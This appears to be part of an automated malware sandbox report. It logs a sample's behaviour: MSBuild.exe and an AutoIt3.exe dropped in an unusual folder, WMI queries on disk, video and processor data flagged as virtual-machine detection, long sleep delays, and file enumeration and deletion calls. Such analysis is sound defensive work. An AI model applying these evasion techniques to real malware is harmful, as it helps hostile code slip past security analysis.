Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\faggbgb\AutoIt3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\faggbgb\AutoIt3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2730000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 28C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 48C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2620000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 27C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 47C0000 memory reserve \| memory write watch

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1483	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 768	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 903	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 505	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6284	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3475	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6305	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3376	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 5443

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	API coverage: 5.8 %
Source: C:\faggbgb\AutoIt3.exe	API coverage: 5.8 %

Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7036	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268	Thread sleep count: 1483 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268	Thread sleep count: 768 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep count: 903 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep count: 505 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7680	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 6305 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep count: 3376 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -55252s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -33907s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -56928s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -39782s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -30803s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -56827s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -43168s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59124s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -59010s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -58293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -58905s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -48998s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5688	Thread sleep time: -58796s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -43078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -41623s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -30886s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -39927s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -51690s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -37021s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -40896s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -39451s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -47353s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2436	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -58506s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -49878s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -40490s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -46272s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -43294s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -40549s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6672	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -39321s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -37810s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -33100s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -58030s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1548	Thread sleep time: -57321s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8088	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\faggbgb\AutoIt3.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\faggbgb\AutoIt3.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C14005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_00C14005
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_00C1C2FF
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1494A GetFileAttributesW,FindFirstFileW,FindClose,	27_2_00C1494A
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	27_2_00C1CD9F
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1CD14 FindFirstFileW,FindClose,	27_2_00C1CD14
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_00C1F5D8
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_00C1F735
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C1FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_00C1FA36
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C13CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_00C13CE2
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B46BD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	27_2_017B46BD
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B47C5 FindFirstFileA,GetLastError,	27_2_017B47C5
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B1FED GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	27_2_017B1FED
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003A4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	29_2_003A4005
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003AC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	29_2_003AC2FF
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003A494A GetFileAttributesW,FindFirstFileW,FindClose,	29_2_003A494A
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003ACD14 FindFirstFileW,FindClose,	29_2_003ACD14
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003ACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	29_2_003ACD9F
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003AF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	29_2_003AF5D8
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003AF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	29_2_003AF735
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003AFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	29_2_003AFA36
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003A3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	29_2_003A3CE2
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018A45F5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	29_2_018A45F5
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018A46FD FindFirstFileA,GetLastError,	29_2_018A46FD
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018A1F25 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	29_2_018A1F25

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BC5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

27_2_00BC5D13

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
